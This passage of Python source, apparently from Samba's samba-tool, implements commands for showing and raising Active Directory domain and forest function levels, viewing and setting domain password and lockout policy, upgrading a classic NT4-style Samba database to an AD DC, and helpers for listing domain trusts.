if level_forest < DS_DOMAIN_FUNCTION_2000 or level_domain < DS_DOMAIN_FUNCTION_2000:
raise CommandError("Domain and/or forest function level(s) is/are invalid. Correct them or reprovision!")
if min_level_dc < DS_DOMAIN_FUNCTION_2000:
raise CommandError("Lowest function level of a DC is invalid. Correct this or reprovision!")
if level_forest > level_domain:
raise CommandError("Forest function level is higher than the domain level(s). Correct this or reprovision!")
if level_domain > min_level_dc:
raise CommandError("Domain function level is higher than the lowest function level of a DC. Correct this or reprovision!")
if subcommand == "show":
self.message("Domain and forest function level for domain '%s'" % domain_dn)
if level_forest == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
self.message("\nATTENTION: You run SAMBA 4 on a forest function level lower than Windows 2000 (Native). This isn't supported! Please raise!")
if level_domain == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
self.message("\nATTENTION: You run SAMBA 4 on a domain function level lower than Windows 2000 (Native). This isn't supported! Please raise!")
if min_level_dc == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
self.message("\nATTENTION: You run SAMBA 4 on a lowest function level of a DC lower than Windows 2003. This isn't supported! Please step-up or upgrade the concerning DC(s)!")
self.message("")
if level_forest == DS_DOMAIN_FUNCTION_2000:
outstr = "2000"
elif level_forest == DS_DOMAIN_FUNCTION_2003_MIXED:
outstr = "2003 with mixed domains/interim (NT4 DC support)"
elif level_forest == DS_DOMAIN_FUNCTION_2003:
outstr = "2003"
elif level_forest == DS_DOMAIN_FUNCTION_2008:
outstr = "2008"
elif level_forest == DS_DOMAIN_FUNCTION_2008_R2:
outstr = "2008 R2"
elif level_forest == DS_DOMAIN_FUNCTION_2012:
outstr = "2012"
elif level_forest == DS_DOMAIN_FUNCTION_2012_R2:
outstr = "2012 R2"
else:
outstr = "higher than 2012 R2"
self.message("Forest function level: (Windows) " + outstr)
if level_domain == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
outstr = "2000 mixed (NT4 DC support)"
elif level_domain == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed == 0:
outstr = "2000"
elif level_domain == DS_DOMAIN_FUNCTION_2003_MIXED:
outstr = "2003 with mixed domains/interim (NT4 DC support)"
elif level_domain == DS_DOMAIN_FUNCTION_2003:
outstr = "2003"
elif level_domain == DS_DOMAIN_FUNCTION_2008:
outstr = "2008"
elif level_domain == DS_DOMAIN_FUNCTION_2008_R2:
outstr = "2008 R2"
elif level_domain == DS_DOMAIN_FUNCTION_2012:
outstr = "2012"
elif level_domain == DS_DOMAIN_FUNCTION_2012_R2:
outstr = "2012 R2"
else:
outstr = "higher than 2012 R2"
self.message("Domain function level: (Windows) " + outstr)
if min_level_dc == DS_DOMAIN_FUNCTION_2000:
outstr = "2000"
elif min_level_dc == DS_DOMAIN_FUNCTION_2003:
outstr = "2003"
elif min_level_dc == DS_DOMAIN_FUNCTION_2008:
outstr = "2008"
elif min_level_dc == DS_DOMAIN_FUNCTION_2008_R2:
outstr = "2008 R2"
elif min_level_dc == DS_DOMAIN_FUNCTION_2012:
outstr = "2012"
elif min_level_dc == DS_DOMAIN_FUNCTION_2012_R2:
outstr = "2012 R2"
else:
outstr = "higher than 2012 R2"
self.message("Lowest function level of a DC: (Windows) " + outstr)
elif subcommand == "raise":
msgs = []
if domain_level is not None:
if domain_level == "2003":
new_level_domain = DS_DOMAIN_FUNCTION_2003
elif domain_level == "2008":
new_level_domain = DS_DOMAIN_FUNCTION_2008
elif domain_level == "2008_R2":
new_level_domain = DS_DOMAIN_FUNCTION_2008_R2
elif domain_level == "2012":
new_level_domain = DS_DOMAIN_FUNCTION_2012
elif domain_level == "2012_R2":
new_level_domain = DS_DOMAIN_FUNCTION_2012_R2
if new_level_domain <= level_domain and level_domain_mixed == 0:
raise CommandError("Domain function level can't be smaller than or equal to the actual one!")
if new_level_domain > min_level_dc:
raise CommandError("Domain function level can't be higher than the lowest function level of a DC!")
# Deactivate mixed/interim domain support
if level_domain_mixed != 0:
# Directly on the base DN
m = ldb.Message()
m.dn = ldb.Dn(samdb, domain_dn)
m["nTMixedDomain"] = ldb.MessageElement("0",
ldb.FLAG_MOD_REPLACE, "nTMixedDomain")
samdb.modify(m)
# Under partitions
m = ldb.Message()
m.dn = ldb.Dn(samdb, "CN=" + lp.get("workgroup") + ",CN=Partitions,%s" % samdb.get_config_basedn())
m["nTMixedDomain"] = ldb.MessageElement("0",
ldb.FLAG_MOD_REPLACE, "nTMixedDomain")
try:
samdb.modify(m)
except ldb.LdbError as e:
(enum, emsg) = e.args
if enum != ldb.ERR_UNWILLING_TO_PERFORM:
raise
# Directly on the base DN
m = ldb.Message()
m.dn = ldb.Dn(samdb, domain_dn)
m["msDS-Behavior-Version"] = ldb.MessageElement(
str(new_level_domain), ldb.FLAG_MOD_REPLACE,
"msDS-Behavior-Version")
samdb.modify(m)
# Under partitions
m = ldb.Message()
m.dn = ldb.Dn(samdb, "CN=" + lp.get("workgroup")
+ ",CN=Partitions,%s" % samdb.get_config_basedn())
m["msDS-Behavior-Version"] = ldb.MessageElement(
str(new_level_domain), ldb.FLAG_MOD_REPLACE,
"msDS-Behavior-Version")
try:
samdb.modify(m)
except ldb.LdbError as e2:
(enum, emsg) = e2.args
if enum != ldb.ERR_UNWILLING_TO_PERFORM:
raise
level_domain = new_level_domain
msgs.append("Domain function level changed!")
if forest_level is not None:
if forest_level == "2003":
new_level_forest = DS_DOMAIN_FUNCTION_2003
elif forest_level == "2008":
new_level_forest = DS_DOMAIN_FUNCTION_2008
elif forest_level == "2008_R2":
new_level_forest = DS_DOMAIN_FUNCTION_2008_R2
elif forest_level == "2012":
new_level_forest = DS_DOMAIN_FUNCTION_2012
elif forest_level == "2012_R2":
new_level_forest = DS_DOMAIN_FUNCTION_2012_R2
if new_level_forest <= level_forest:
raise CommandError("Forest function level can't be smaller than or equal to the actual one!")
if new_level_forest > level_domain:
raise CommandError("Forest function level can't be higher than the domain function level(s). Please raise it/them first!")
m = ldb.Message()
m.dn = ldb.Dn(samdb, "CN=Partitions,%s" % samdb.get_config_basedn())
m["msDS-Behavior-Version"] = ldb.MessageElement(
str(new_level_forest), ldb.FLAG_MOD_REPLACE,
"msDS-Behavior-Version")
samdb.modify(m)
msgs.append("Forest function level changed!")
msgs.append("All changes applied successfully!")
self.message("\n".join(msgs))
else:
raise CommandError("invalid argument: '%s' (choose from 'show', 'raise')" % subcommand)
# In MS AD, setting a timeout to '(never)' corresponds to this value
NEVER_TIMESTAMP = int(-0x8000000000000000)
def timestamp_to_mins(timestamp_str):
"""Converts a timestamp in -100 nanosecond units to minutes"""
# treat a timestamp of 'never' the same as zero (this should work OK for
# most settings, and it displays better than trying to convert
# -0x8000000000000000 to minutes)
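# e.g. a minPwdAge of -864000000000 ticks (1 day) yields 1440 minutes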
if int(timestamp_str) == NEVER_TIMESTAMP:
return 0
else:
return abs(int(timestamp_str)) / (1e7 * 60)
def timestamp_to_days(timestamp_str):
"""Converts a timestamp in -100 nanosecond units to days"""
return timestamp_to_mins(timestamp_str) / (60 * 24)
class cmd_domain_passwordsettings_show(Command):
"""Display current password settings for the domain."""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
]
def run(self, H=None, credopts=None, sambaopts=None, versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
domain_dn = samdb.domain_dn()
res = samdb.search(domain_dn, scope=ldb.SCOPE_BASE,
attrs=["pwdProperties", "pwdHistoryLength", "minPwdLength",
"minPwdAge", "maxPwdAge", "lockoutDuration", "lockoutThreshold",
"lockOutObservationWindow"])
assert(len(res) == 1)
try:
pwd_props = int(res[0]["pwdProperties"][0])
pwd_hist_len = int(res[0]["pwdHistoryLength"][0])
cur_min_pwd_len = int(res[0]["minPwdLength"][0])
# ticks -> days
cur_min_pwd_age = timestamp_to_days(res[0]["minPwdAge"][0])
cur_max_pwd_age = timestamp_to_days(res[0]["maxPwdAge"][0])
cur_account_lockout_threshold = int(res[0]["lockoutThreshold"][0])
# ticks -> mins
cur_account_lockout_duration = timestamp_to_mins(res[0]["lockoutDuration"][0])
cur_reset_account_lockout_after = timestamp_to_mins(res[0]["lockOutObservationWindow"][0])
except Exception as e:
raise CommandError("Could not retrieve password properties!", e)
self.message("Password information for domain '%s'" % domain_dn)
self.message("")
if pwd_props & DOMAIN_PASSWORD_COMPLEX != 0:
self.message("Password complexity: on")
else:
self.message("Password complexity: off")
if pwd_props & DOMAIN_PASSWORD_STORE_CLEARTEXT != 0:
self.message("Store plaintext passwords: on")
else:
self.message("Store plaintext passwords: off")
self.message("Password history length: %d" % pwd_hist_len)
self.message("Minimum password length: %d" % cur_min_pwd_len)
self.message("Minimum password age (days): %d" % cur_min_pwd_age)
self.message("Maximum password age (days): %d" % cur_max_pwd_age)
self.message("Account lockout duration (mins): %d" % cur_account_lockout_duration)
self.message("Account lockout threshold (attempts): %d" % cur_account_lockout_threshold)
self.message("Reset account lockout after (mins): %d" % cur_reset_account_lockout_after)
class cmd_domain_passwordsettings_set(Command):
"""Set password settings.
Sets password complexity, password lockout policy, history length,
minimum password length, and the minimum and maximum password age on
a Samba AD DC.
Use against a Windows DC is possible, but group policy will override it.
"""
synopsis = "%prog <options> [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"), # unused
Option("--complexity", type="choice", choices=["on", "off", "default"],
help="The password complexity (on | off | default). Default is 'on'"),
Option("--store-plaintext", type="choice", choices=["on", "off", "default"],
help="Store plaintext passwords where account have 'store passwords with reversible encryption' set (on | off | default). Default is 'off'"),
Option("--history-length",
help="The password history length (<integer> | default). Default is 24.", type=str),
Option("--min-pwd-length",
help="The minimum password length (<integer> | default). Default is 7.", type=str),
Option("--min-pwd-age",
help="The minimum password age (<integer in days> | default). Default is 1.", type=str),
Option("--max-pwd-age",
help="The maximum password age (<integer in days> | default). Default is 43.", type=str),
Option("--account-lockout-duration",
help="The the length of time an account is locked out after exeeding the limit on bad password attempts (<integer in mins> | default). Default is 30 mins.", type=str),
Option("--account-lockout-threshold",
help="The number of bad password attempts allowed before locking out the account (<integer> | default). Default is 0 (never lock out).", type=str),
Option("--reset-account-lockout-after",
help="After this time is elapsed, the recorded number of attempts restarts from zero (<integer> | default). Default is 30.", type=str),
]
def run(self, H=None, min_pwd_age=None, max_pwd_age=None,
quiet=False, complexity=None, store_plaintext=None, history_length=None,
min_pwd_length=None, account_lockout_duration=None, account_lockout_threshold=None,
reset_account_lockout_after=None, credopts=None, sambaopts=None,
versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
domain_dn = samdb.domain_dn()
msgs = []
m = ldb.Message()
m.dn = ldb.Dn(samdb, domain_dn)
pwd_props = int(samdb.get_pwdProperties())
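# pwdProperties is a bitmask; the complexity and plaintext-storage
# flags are toggled on it below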
# get the current password age settings
max_pwd_age_ticks = samdb.get_maxPwdAge()
min_pwd_age_ticks = samdb.get_minPwdAge()
if complexity is not None:
if complexity == "on" or complexity == "default":
pwd_props = pwd_props | DOMAIN_PASSWORD_COMPLEX
msgs.append("Password complexity activated!")
elif complexity == "off":
pwd_props = pwd_props & (~DOMAIN_PASSWORD_COMPLEX)
msgs.append("Password complexity deactivated!")
if store_plaintext is not None:
if store_plaintext == "on" or store_plaintext == "default":
pwd_props = pwd_props | DOMAIN_PASSWORD_STORE_CLEARTEXT
msgs.append("Plaintext password storage for changed passwords activated!")
elif store_plaintext == "off":
pwd_props = pwd_props & (~DOMAIN_PASSWORD_STORE_CLEARTEXT)
msgs.append("Plaintext password storage for changed passwords deactivated!")
if complexity is not None or store_plaintext is not None:
m["pwdProperties"] = ldb.MessageElement(str(pwd_props),
ldb.FLAG_MOD_REPLACE, "pwdProperties")
if history_length is not None:
if history_length == "default":
pwd_hist_len = 24
else:
pwd_hist_len = int(history_length)
if pwd_hist_len < 0 or pwd_hist_len > 24:
raise CommandError("Password history length must be in the range of 0 to 24!")
m["pwdHistoryLength"] = ldb.MessageElement(str(pwd_hist_len),
ldb.FLAG_MOD_REPLACE, "pwdHistoryLength")
msgs.append("Password history length changed!")
if min_pwd_length is not None:
if min_pwd_length == "default":
min_pwd_len = 7
else:
min_pwd_len = int(min_pwd_length)
if min_pwd_len < 0 or min_pwd_len > 14:
raise CommandError("Minimum password length must be in the range of 0 to 14!")
m["minPwdLength"] = ldb.MessageElement(str(min_pwd_len),
ldb.FLAG_MOD_REPLACE, "minPwdLength")
msgs.append("Minimum password length changed!")
if min_pwd_age is not None:
if min_pwd_age == "default":
min_pwd_age = 1
else:
min_pwd_age = int(min_pwd_age)
if min_pwd_age < 0 or min_pwd_age > 998:
raise CommandError("Minimum password age must be in the range of 0 to 998!")
# days -> ticks
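# (1 day = 24*60*60 seconds = 864,000,000,000 ticks of 100 ns, stored negative)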
min_pwd_age_ticks = -int(min_pwd_age * (24 * 60 * 60 * 1e7))
m["minPwdAge"] = ldb.MessageElement(str(min_pwd_age_ticks),
ldb.FLAG_MOD_REPLACE, "minPwdAge")
msgs.append("Minimum password age changed!")
if max_pwd_age is not None:
if max_pwd_age == "default":
max_pwd_age = 43
else:
max_pwd_age = int(max_pwd_age)
if max_pwd_age < 0 or max_pwd_age > 999:
raise CommandError("Maximum password age must be in the range of 0 to 999!")
# days -> ticks
if max_pwd_age == 0:
max_pwd_age_ticks = NEVER_TIMESTAMP
else:
max_pwd_age_ticks = -int(max_pwd_age * (24 * 60 * 60 * 1e7))
m["maxPwdAge"] = ldb.MessageElement(str(max_pwd_age_ticks),
ldb.FLAG_MOD_REPLACE, "maxPwdAge")
msgs.append("Maximum password age changed!")
if account_lockout_duration is not None:
if account_lockout_duration == "default":
account_lockout_duration = 30
else:
account_lockout_duration = int(account_lockout_duration)
if account_lockout_duration < 0 or account_lockout_duration > 99999:
raise CommandError("Maximum password age must be in the range of 0 to 99999!")
# minutes -> ticks
if account_lockout_duration == 0:
account_lockout_duration_ticks = NEVER_TIMESTAMP
else:
account_lockout_duration_ticks = -int(account_lockout_duration * (60 * 1e7))
m["lockoutDuration"] = ldb.MessageElement(str(account_lockout_duration_ticks),
ldb.FLAG_MOD_REPLACE, "lockoutDuration")
msgs.append("Account lockout duration changed!")
if account_lockout_threshold is not None:
if account_lockout_threshold == "default":
account_lockout_threshold = 0
else:
account_lockout_threshold = int(account_lockout_threshold)
m["lockoutThreshold"] = ldb.MessageElement(str(account_lockout_threshold),
ldb.FLAG_MOD_REPLACE, "lockoutThreshold")
msgs.append("Account lockout threshold changed!")
if reset_account_lockout_after is not None:
if reset_account_lockout_after == "default":
reset_account_lockout_after = 30
else:
reset_account_lockout_after = int(reset_account_lockout_after)
if reset_account_lockout_after < 0 or reset_account_lockout_after > 99999:
raise CommandError("Maximum password age must be in the range of 0 to 99999!")
# minutes -> ticks
if reset_account_lockout_after == 0:
reset_account_lockout_after_ticks = NEVER_TIMESTAMP
else:
reset_account_lockout_after_ticks = -int(reset_account_lockout_after * (60 * 1e7))
m["lockOutObservationWindow"] = ldb.MessageElement(str(reset_account_lockout_after_ticks),
ldb.FLAG_MOD_REPLACE, "lockOutObservationWindow")
msgs.append("Duration to reset account lockout after changed!")
if max_pwd_age or min_pwd_age:
# If we're setting either min or max password, make sure the max is
# still greater overall. As either setting could be None, we use the
# ticks here (which are always set) and work backwards.
max_pwd_age = timestamp_to_days(max_pwd_age_ticks)
min_pwd_age = timestamp_to_days(min_pwd_age_ticks)
if max_pwd_age != 0 and min_pwd_age >= max_pwd_age:
raise CommandError("Maximum password age (%d) must be greater than minimum password age (%d)!" % (max_pwd_age, min_pwd_age))
if len(m) == 0:
raise CommandError("You must specify at least one option to set. Try --help")
samdb.modify(m)
msgs.append("All changes applied successfully!")
self.message("\n".join(msgs))
class cmd_domain_passwordsettings(SuperCommand):
"""Manage password policy settings."""
subcommands = {}
subcommands["pso"] = cmd_domain_passwordsettings_pso()
subcommands["show"] = cmd_domain_passwordsettings_show()
subcommands["set"] = cmd_domain_passwordsettings_set()
class cmd_domain_classicupgrade(Command):
"""Upgrade from Samba classic (NT4-like) database to Samba AD DC database.
Specify either a directory with all Samba classic DC databases and state files (with --dbdir) or
the testparm utility from your classic installation (with --testparm).
"""
synopsis = "%prog [options] <classic_smb_conf>"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions
}
takes_options = [
Option("--dbdir", type="string", metavar="DIR",
help="Path to samba classic DC database directory"),
Option("--testparm", type="string", metavar="PATH",
help="Path to samba classic DC testparm utility from the previous installation. This allows the default paths of the previous installation to be followed"),
Option("--targetdir", type="string", metavar="DIR",
help="Path prefix where the new Samba 4.0 AD domain should be initialised"),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
Option("-v", "--verbose", help="Be verbose", action="store_true"),
Option("--dns-backend", type="choice", metavar="NAMESERVER-BACKEND",
choices=["SAMBA_INTERNAL", "BIND9_FLATFILE", "BIND9_DLZ", "NONE"],
help="The DNS server backend. SAMBA_INTERNAL is the builtin name server (default), "
"BIND9_FLATFILE uses bind9 text database to store zone information, "
"BIND9_DLZ uses samba4 AD to store zone information, "
"NONE skips the DNS setup entirely (this DC will not be a DNS server)",
default="SAMBA_INTERNAL")
]
ntvfs_options = [
Option("--use-xattrs", type="choice", choices=["yes", "no", "auto"],
metavar="[yes|no|auto]",
help="Define if we should use the native fs capabilities or a tdb file for "
"storing attributes likes ntacl when --use-ntvfs is set. "
"auto tries to make an inteligent guess based on the user rights and system capabilities",
default="auto")
]
if samba.is_ntvfs_fileserver_built():
takes_options.extend(common_ntvfs_options)
takes_options.extend(ntvfs_options)
takes_args = ["smbconf"]
def run(self, smbconf=None, targetdir=None, dbdir=None, testparm=None,
quiet=False, verbose=False, use_xattrs="auto", sambaopts=None, versionopts=None,
dns_backend=None, use_ntvfs=False):
if not os.path.exists(smbconf):
raise CommandError("File %s does not exist" % smbconf)
if testparm and not os.path.exists(testparm):
raise CommandError("Testparm utility %s does not exist" % testparm)
if dbdir and not os.path.exists(dbdir):
raise CommandError("Directory %s does not exist" % dbdir)
if not dbdir and not testparm:
raise CommandError("Please specify either dbdir or testparm")
logger = self.get_logger(verbose=verbose, quiet=quiet)
if dbdir and testparm:
logger.warning("both dbdir and testparm specified, ignoring dbdir.")
dbdir = None
lp = sambaopts.get_loadparm()
s3conf = s3param.get_context()
if sambaopts.realm:
s3conf.set("realm", sambaopts.realm)
if targetdir is not None:
if not os.path.isdir(targetdir):
os.mkdir(targetdir)
eadb = True
if use_xattrs == "yes":
eadb = False
elif use_xattrs == "auto" and use_ntvfs == False:
eadb = False
elif use_ntvfs == False:
raise CommandError("--use-xattrs=no requires --use-ntvfs (not supported for production use). "
"Please re-run with --use-xattrs omitted.")
elif use_xattrs == "auto" and not s3conf.get("posix:eadb"):
if targetdir:
tmpfile = tempfile.NamedTemporaryFile(dir=os.path.abspath(targetdir))
else:
tmpfile = tempfile.NamedTemporaryFile(dir=os.path.abspath(os.path.dirname(lp.get("private dir"))))
try:
try:
samba.ntacls.setntacl(lp, tmpfile.name,
"O:S-1-5-32G:S-1-5-32",
"S-1-5-32",
system_session_unix(),
"native")
eadb = False
except Exception:
# FIXME: Don't catch all exceptions here
logger.info("You are not root or your system does not support xattr, using tdb backend for attributes. "
"If you intend to use this provision in production, rerun the script as root on a system supporting xattrs.")
finally:
tmpfile.close()
# Set correct default values from dbdir or testparm
paths = {}
if dbdir:
paths["state directory"] = dbdir
paths["private dir"] = dbdir
paths["lock directory"] = dbdir
paths["smb passwd file"] = dbdir + "/smbpasswd"
else:
paths["state directory"] = get_testparm_var(testparm, smbconf, "state directory")
paths["private dir"] = get_testparm_var(testparm, smbconf, "private dir")
paths["smb passwd file"] = get_testparm_var(testparm, smbconf, "smb passwd file")
paths["lock directory"] = get_testparm_var(testparm, smbconf, "lock directory")
# "testparm" from Samba 3 < 3.4.x is not aware of the parameter
# "state directory", instead make use of "lock directory"
if len(paths["state directory"]) == 0:
paths["state directory"] = paths["lock directory"]
for p in paths:
s3conf.set(p, paths[p])
# load smb.conf parameters
logger.info("Reading smb.conf")
s3conf.load(smbconf)
samba3 = Samba3(smbconf, s3conf)
logger.info("Provisioning")
upgrade_from_samba3(samba3, logger, targetdir, session_info=system_session(),
useeadb=eadb, dns_backend=dns_backend, use_ntvfs=use_ntvfs)
class cmd_domain_samba3upgrade(cmd_domain_classicupgrade):
__doc__ = cmd_domain_classicupgrade.__doc__
# This command is present for backwards compatibility only,
# and should not be shown.
hidden = True
class LocalDCCredentialsOptions(options.CredentialsOptions):
def __init__(self, parser):
options.CredentialsOptions.__init__(self, parser, special_name="local-dc")
class DomainTrustCommand(Command):
"""List domain trusts."""
def __init__(self):
Command.__init__(self)
self.local_lp = None
self.local_server = None
self.local_binding_string = None
self.local_creds = None
self.remote_server = None
self.remote_binding_string = None
self.remote_creds = None
def _uint32(self, v):
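# map a (possibly negative) Python int to its unsigned 32-bit value,
# matching how NTSTATUS/WERROR codes appear in RuntimeError args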
return ctypes.c_uint32(v).value
def check_runtime_error(self, runtime, val):
if runtime is None:
return False
err32 = self._uint32(runtime.args[0])
if err32 == val:
return True
return False
class LocalRuntimeError(CommandError):
def __init__(exception_self, self, runtime, message):
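# Note: 'exception_self' is the exception instance being constructed;
# 'self' is the enclosing DomainTrustCommand, passed in explicitly so
# the message can include its server details. The sibling error
# classes below use the same pattern.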
err32 = self._uint32(runtime.args[0])
errstr = runtime.args[1]
msg = "LOCAL_DC[%s]: %s - ERROR(0x%08X) - %s" % (
self.local_server, message, err32, errstr)
CommandError.__init__(exception_self, msg)
class RemoteRuntimeError(CommandError):
def __init__(exception_self, self, runtime, message):
err32 = self._uint32(runtime.args[0])
errstr = runtime.args[1]
msg = "REMOTE_DC[%s]: %s - ERROR(0x%08X) - %s" % (
self.remote_server, message, err32, errstr)
CommandError.__init__(exception_self, msg)
class LocalLdbError(CommandError):
def __init__(exception_self, self, ldb_error, message):
errval = ldb_error.args[0]
errstr = ldb_error.args[1]
msg = "LOCAL_DC[%s]: %s - ERROR(%d) - %s" % (
self.local_server, message, errval, errstr)
CommandError.__init__(exception_self, msg)
def setup_local_server(self, sambaopts, localdcopts):
if self.local_server is not None:
return self.local_server
lp = sambaopts.get_loadparm()
local_server = localdcopts.ipaddress
if local_server is None:
server_role = lp.server_role()
if server_role != "ROLE_ACTIVE_DIRECTORY_DC":
raise CommandError("Invalid server_role %s" % (server_role))
local_server = lp.get('netbios name')
local_transport = "ncalrpc"
local_binding_options = ""
local_binding_options += ",auth_type=ncalrpc_as_system"
local_ldap_url = None
local_creds = None
else:
local_transport = "ncacn_np"
local_binding_options = ""
local_ldap_url = "ldap://%s" % local_server
local_creds = localdcopts.get_credentials(lp)
self.local_lp = lp
self.local_server = local_server
self.local_binding_string = "%s:%s[%s]" % (local_transport, local_server, local_binding_options)
self.local_ldap_url = local_ldap_url
self.local_creds = local_creds
return self.local_server
def new_local_lsa_connection(self):
return lsa.lsarpc(self.local_binding_string, self.local_lp, self.local_creds)
def new_local_netlogon_connection(self):
return netlogon.netlogon(self.local_binding_string, self.local_lp, self.local_creds)
def new_local_ldap_connection(self):
return SamDB(url=self.local_ldap_url,
session_info=system_session(),
credentials=self.local_creds,
lp=self.local_lp)
def setup_remote_server(self, credopts, domain,
require_pdc=True,
require_writable=True):
if require_pdc:
assert require_writable
if self.remote_server is not None:
return self.remote_server
self.remote_server = "__unknown__remote_server__.%s" % domain
assert self.local_server is not None
remote_creds = credopts.get_credentials(self.local_lp)
remote_server = credopts.ipaddress
remote_binding_options = ""
# TODO: we should also support NT4 domains
# we could use local_netlogon.netr_DsRGetDCNameEx2() with the remote domain name
# and delegate NBT or CLDAP to the local netlogon server
try:
remote_net = Net(remote_creds, self.local_lp, server=remote_server)
remote_flags = nbt.NBT_SERVER_LDAP | nbt.NBT_SERVER_DS
if require_writable:
remote_flags |= nbt.NBT_SERVER_WRITABLE
if require_pdc:
remote_flags |= nbt.NBT_SERVER_PDC
remote_info = remote_net.finddc(flags=remote_flags, domain=domain, address=remote_server)
except NTSTATUSError as error:
raise CommandError("Failed to find a writeable DC for domain '%s': %s" %
(domain, error.args[1]))
except Exception:
raise CommandError("Failed to find a writeable DC for domain '%s'" % domain)
flag_map = {
nbt.NBT_SERVER_PDC: "PDC",
nbt.NBT_SERVER_GC: "GC",
nbt.NBT_SERVER_LDAP: "LDAP",
nbt.NBT_SERVER_DS: "DS",
nbt.NBT_SERVER_KDC: "KDC",
nbt.NBT_SERVER_TIMESERV: "TIMESERV",
nbt.NBT_SERVER_CLOSEST: "CLOSEST",
nbt.NBT_SERVER_WRITABLE: "WRITABLE",
nbt.NBT_SERVER_GOOD_TIMESERV: "GOOD_TIMESERV",
nbt.NBT_SERVER_NDNC: "NDNC",
nbt.NBT_SERVER_SELECT_SECRET_DOMAIN_6: "SELECT_SECRET_DOMAIN_6",
nbt.NBT_SERVER_FULL_SECRET_DOMAIN_6: "FULL_SECRET_DOMAIN_6",
nbt.NBT_SERVER_ADS_WEB_SERVICE: "ADS_WEB_SERVICE",
nbt.NBT_SERVER_DS_8: "DS_8",
nbt.NBT_SERVER_HAS_DNS_NAME: "HAS_DNS_NAME",
nbt.NBT_SERVER_IS_DEFAULT_NC: "IS_DEFAULT_NC",
nbt.NBT_SERVER_FOREST_ROOT: "FOREST_ROOT",
}
server_type_string = self.generic_bitmap_to_string(flag_map,
remote_info.server_type, names_only=True)
self.outf.write("RemoteDC Netbios[%s] DNS[%s] ServerType[%s]\n" % (
remote_info.pdc_name,
remote_info.pdc_dns_name,
server_type_string))
self.remote_server = remote_info.pdc_dns_name
self.remote_binding_string = "ncacn_np:%s[%s]" % (self.remote_server, remote_binding_options)
self.remote_creds = remote_creds
return self.remote_server
def new_remote_lsa_connection(self):
return lsa.lsarpc(self.remote_binding_string, self.local_lp, self.remote_creds)
def new_remote_netlogon_connection(self):
return netlogon.netlogon(self.remote_binding_string, self.local_lp, self.remote_creds)
def get_lsa_info(self, conn, policy_access):
objectAttr = lsa.ObjectAttribute()
objectAttr.sec_qos = lsa.QosInfo()
policy = conn.OpenPolicy2('',
objectAttr, policy_access)
info = conn.QueryInfoPolicy2(policy, lsa.LSA_POLICY_INFO_DNS)
return (policy, info)
def get_netlogon_dc_unc(self, conn, server, domain):
try:
info = conn.netr_DsRGetDCNameEx2(server,
None, 0, None, None, None,
netlogon.DS_RETURN_DNS_NAME)
return info.dc_unc
except RuntimeError:
return conn.netr_GetDcName(server, domain)
def get_netlogon_dc_info(self, conn, server):
info = conn.netr_DsRGetDCNameEx2(server,
None, 0, None, None, None,
netlogon.DS_RETURN_DNS_NAME)
return info
def netr_DomainTrust_to_name(self, t):
if t.trust_type == lsa.LSA_TRUST_TYPE_DOWNLEVEL:
return t.netbios_name
return t.dns_name
def netr_DomainTrust_to_type(self, a, t):
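# Classify the trust relative to our primary domain: within the forest
# it is Parent, TreeRoot, Child or Shortcut; outside the forest it is
# Forest (transitive) or External.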
primary = None
primary_parent = None
for _t in a:
if _t.trust_flags & netlogon.NETR_TRUST_FLAG_PRIMARY:
primary = _t
if not _t.trust_flags & netlogon.NETR_TRUST_FLAG_TREEROOT:
primary_parent = a[_t.parent_index]
break
if t.trust_flags & netlogon.NETR_TRUST_FLAG_IN_FOREST:
if t is primary_parent:
return "Parent"
if t.trust_flags & netlogon.NETR_TRUST_FLAG_TREEROOT:
return "TreeRoot"
parent = a[t.parent_index]
if parent is primary:
return "Child"
return "Shortcut"
if t.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
return "Forest"
return "External"
def netr_DomainTrust_to_transitive(self, t):
if t.trust_flags & netlogon.NETR_TRUST_FLAG_IN_FOREST:
return "Yes"
if t.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE:
return "No"
if t.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
return "Yes"
return "No"
def netr_DomainTrust_to_direction(self, t):
if t.trust_flags & netlogon.NETR_TRUST_FLAG_INBOUND and \
t.trust_flags & netlogon.NETR_TRUST_FLAG_OUTBOUND:
return "BOTH"
if t.trust_flags & netlogon.NETR_TRUST_FLAG_INBOUND:
return "INCOMING"
if t.trust_flags & netlogon.NETR_TRUST_FLAG_OUTBOUND:
return "OUTGOING"
return "INVALID"
def generic_enum_to_string(self, e_dict, v, names_only=False):
try:
w = e_dict[v]
except KeyError:
v32 = self._uint32(v)
w = "__unknown__%08X__" % v32
r = "0x%x (%s)" % (v, w)
return r
def generic_bitmap_to_string(self, b_dict, v, names_only=False):
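# decompose v into the named bits from b_dict; any remaining
# unrecognised bits are reported as __unknown_XXXXXXXX__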
s = []
c = v
for b in sorted(b_dict.keys()):
if not (c & b):
continue
c &= ~b
s += [b_dict[b]]
if c != 0:
c32 = self._uint32(c)
s += ["__unknown_%08X__" % c32]
w = ",".join(s)
if names_only:
return w
r = "0x%x (%s)" % (v, w)
return r
def trustType_string(self, v):
types = {
lsa.LSA_TRUST_TYPE_DOWNLEVEL: "DOWNLEVEL",
lsa.LSA_TRUST_TYPE_UPLEVEL: "UPLEVEL",
lsa.LSA_TRUST_TYPE_MIT: "MIT",
